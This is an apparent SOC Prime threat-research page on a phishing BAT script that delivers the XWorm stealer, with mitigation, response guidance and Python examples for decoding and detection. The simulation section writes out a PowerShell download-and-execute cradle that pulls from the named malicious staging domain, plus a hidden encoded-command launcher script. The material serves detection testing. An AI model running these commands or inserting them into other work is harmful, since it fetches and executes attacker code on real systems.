SOC Prime Bias: Medium

06 Feb 2026 15:26 UTC

Malicious Script Delivering More Maliciousness

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A phishing email delivers a malicious attachment containing a BAT script that launches PowerShell to pull down a Base64-encoded payload. After decoding, the payload resolves to XWorm, a .NET stealer that fingerprints the host and exfiltrates collected data through a Telegram bot. Persistence is established by creating a scheduled task that repeatedly runs the dropped executable. The operation relies on multiple infrastructure elements, including a fake image-hosting lure and at least one compromised IP used for payload staging.

Investigation

Review of the BAT script exposed a PowerShell one-liner that retrieves a PNG-looking file from an attacker-controlled domain. The embedded Base64 content is then sanitized, reversed, and decoded to reconstruct the .NET executable. Binary analysis showed the malware registers a scheduled task named Chromiumx2 and uses Telegram’s API for command-and-control and data exfiltration. Investigators extracted key network indicators, including the hosting domain, associated IP address, and the Telegram API endpoint referenced during execution.
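The sanitize, reverse and decode chain described above, written out as an added example (this is not SOC Prime's decoder). It assumes that "sanitized" means dropping every byte outside the Base64 alphabet, which the write-up does not spell out, and it runs on a constructed stand-in (a fake PE header plus filler) instead of the real payload.

```python
import base64
import re

# Everything outside the Base64 alphabet is dropped. This is an assumption about
# what the "sanitize" step in the investigation does; the page does not say.
NOT_B64 = re.compile(rb"[^A-Za-z0-9+/=]")


def sanitize(blob: bytes) -> bytes:
    """Strip whitespace, junk bytes and decoy text surrounding the Base64 body."""
    return NOT_B64.sub(b"", blob)


def reconstruct(blob: bytes) -> bytes:
    """Sanitize, reverse, then Base64-decode the staged text back into a binary."""
    cleaned = sanitize(blob)[::-1]
    if not cleaned:
        raise ValueError("no Base64 content found in staged file")
    cleaned += b"=" * (-len(cleaned) % 4)  # restore padding if it was stripped
    try:
        return base64.b64decode(cleaned, validate=True)
    except ValueError as exc:  # binascii.Error is a ValueError subclass
        raise ValueError("staged text did not decode as reversed Base64") from exc


def looks_like_pe(data: bytes) -> bool:
    """A .NET executable is a PE file, so a successful decode should start with 'MZ'."""
    return data[:2] == b"MZ"


# --- constructed sample --------------------------------------------------------
# Stand-in for the real binary: a fake PE header plus filler, not malware.
FAKE_PE = b"MZ\x90\x00" + b"This program cannot be run in DOS mode.\r\n$" + b"\x00" * 40


def stage(binary: bytes) -> bytes:
    """Build the kind of file the script fetched: reversed Base64 split into
    lines and sprinkled with non-alphabet junk so it does not look like Base64."""
    reversed_b64 = base64.b64encode(binary)[::-1]
    chunks = [reversed_b64[i:i + 24] for i in range(0, len(reversed_b64), 24)]
    return b"#!\r\n" + b" ~\r\n".join(chunks) + b"\r\n~~~~"


STAGED_SAMPLE = stage(FAKE_PE)

if __name__ == "__main__":
    recovered = reconstruct(STAGED_SAMPLE)
    print(f"decoded {len(recovered)} bytes, PE header present: {looks_like_pe(recovered)}")
```

The MZ check is the cheap sanity test an analyst applies before handing the output to a disassembler or sandbox: if the reversed decode does not yield a PE header, the sanitize assumption was wrong for that sample and the stripping rule needs to be adjusted.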

Mitigation

Prevent execution of untrusted BAT and PowerShell content originating from email attachments or user download directories. Apply application allow-listing to restrict scheduled task creation and flag suspicious new task registrations. Monitor and, where feasible, restrict outbound access to Telegram API endpoints and block the identified malicious domains at DNS/proxy layers. Keep endpoint detections updated with newly observed indicators and script-based download patterns.

Response

Isolate endpoints where the Chromiumx2 scheduled task or Chromiumx2.exe is observed. Remove the scheduled task, delete the malicious binary, and collect artifacts (script, decoded payload, task XML, and relevant logs) for forensic scoping. Hunt across the environment for the same task name, similar PowerShell decode behavior, and Telegram-driven traffic. Reset potentially exposed credentials and notify users about the phishing attachment to reduce repeat execution.

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

  • Attack Narrative & Commands:
    The attacker wants to download and execute a malicious payload from a compromised web server. To evade classic signature detection, they embed the entire download-and-execute logic in a single Base64 string and invoke PowerShell with -EncodedCommand. The command references the exact URL that the detection rule monitors (https://uniworldrivercruises-co.uk/optimized_MSI.png).

    1. Encode the malicious payload (a simple downloader that runs the received script):

      $payload = "IEX (New-Object Net.WebClient).DownloadString('https://uniworldrivercruises-co.uk/optimized_MSI.png')"
      $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
      Write-Host $b64

      Resulting B64 (example): SQBFAFgAIABpAG4AIABOAGUAdwAtAE8AbgB0AGkAYwBzACA... (truncated).

    2. Execute the encoded command:

      powershell -EncodedCommand SQBFAFgAIABpAG4AIABOAGUAdwAtAE8AbgB0AGkAYwBzACA...

    This single line generates the exact telemetry the Sigma rule expects: a PowerShell process, the -EncodedCommand flag, and the malicious URL inside the decoded script block.

  • Regression Test Script:

    #-------------------------------------------------
    # Regression script to trigger the detection rule
    #-------------------------------------------------
    # 1. Build the malicious payload
    $payload = "IEX (New-Object Net.WebClient).DownloadString('https://uniworldrivercruises-co.uk/optimized_MSI.png')"
    $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
    
    # 2. Execute the payload via an encoded PowerShell command
    Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -EncodedCommand $b64" `
        -WindowStyle Hidden -PassThru | Out-Null
    
    Write-Host "Malicious encoded command executed."
    #-------------------------------------------------
  • Cleanup Commands:

    # Remove any transient files (none expected because the payload streams directly)
    # Terminate any lingering hidden PowerShell processes started by the test.
    # Get-Process does not populate StartInfo.Arguments for processes it did not
    # start itself, so the command line has to come from Win32_Process instead.
    Get-CimInstance -ClassName Win32_Process -Filter "Name = 'powershell.exe'" -ErrorAction SilentlyContinue |
        Where-Object { $_.CommandLine -match '-EncodedCommand' } |
        ForEach-Object { Stop-Process -Id $_.ProcessId -Force -ErrorAction SilentlyContinue }
    
    Write-Host "Cleanup complete."
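The telemetry the simulation is meant to produce (a PowerShell process, the -EncodedCommand flag, the staging URL inside the decoded script block) and the hunt the Response section calls for (the same task name, similar PowerShell decode behaviour) expressed as detection logic over a few constructed log records. This is an added example, not SOC Prime's Sigma rule or tooling: the field names (EventID, Host, Image, CommandLine, TaskName) follow Sysmon Event ID 1 and Security Event ID 4698, the records themselves are made up, and the indicators are the URL and task name quoted in the write-up.

```python
import base64
import re
from typing import Optional

# Indicators taken from the write-up above.
MALICIOUS_URL = "uniworldrivercruises-co.uk/optimized_MSI.png"
PERSISTENCE_TASK = "Chromiumx2"

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings seen most often. -ExecutionPolicy does not match because it is
# followed by letters, not whitespace.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|\bIEX\b|Invoke-Expression",
    re.IGNORECASE)


def encode_command(script: str) -> str:
    """Same transform the simulation uses: UTF-16LE bytes, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script block if the command line carries -EncodedCommand."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # truncated or non-PowerShell Base64: not decodable, no verdict


def check_process_event(event: dict) -> list:
    """Sysmon Event ID 1 style record: Image + CommandLine."""
    reasons = []
    if not event.get("Image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        return reasons
    decoded = decode_encoded_command(event.get("CommandLine", ""))
    if decoded is None:
        return reasons
    reasons.append("PowerShell started with -EncodedCommand")
    if MALICIOUS_URL.lower() in decoded.lower():
        reasons.append("decoded script block references the known staging URL")
    if DOWNLOAD_CRADLE.search(decoded):
        reasons.append("decoded script block contains a download-and-execute cradle")
    return reasons


def check_task_event(event: dict) -> list:
    """Security Event ID 4698 style record: name of a newly registered task."""
    name = event.get("TaskName", "").strip("\\").lower()
    return ["scheduled task name matches XWorm persistence"] if name == PERSISTENCE_TASK.lower() else []


def scan(events: list) -> list:
    """Return (host, reasons) for every matching event; non-matching events are dropped."""
    hits = []
    for ev in events:
        if ev.get("EventID") == 1:
            reasons = check_process_event(ev)
        elif ev.get("EventID") == 4698:
            reasons = check_task_event(ev)
        else:
            reasons = []
        if reasons:
            hits.append((ev.get("Host", "?"), reasons))
    return hits


# --- constructed sample telemetry ----------------------------------------------
SIMULATION_PAYLOAD = (
    "IEX (New-Object Net.WebClient).DownloadString("
    "'https://uniworldrivercruises-co.uk/optimized_MSI.png')")

SAMPLE_EVENTS = [
    {"EventID": 1, "Host": "WS01",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
                    + encode_command(SIMULATION_PAYLOAD)},
    {"EventID": 1, "Host": "WS02",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"EventID": 4698, "Host": "WS01", "TaskName": r"\Chromiumx2"},
    {"EventID": 4698, "Host": "WS03", "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag"},
]

if __name__ == "__main__":
    for host, reasons in scan(SAMPLE_EVENTS):
        print(host, "->", "; ".join(reasons))
```

The decode step matters because the URL never appears in the raw command line; a rule that only string-matches CommandLine misses this sample entirely. An event that carries only the first reason (encoded command, no cradle, no known URL) is worth a low-severity alert at most, whereas all three reasons together, or the task name on the same host, is the combination the Response section says to isolate on.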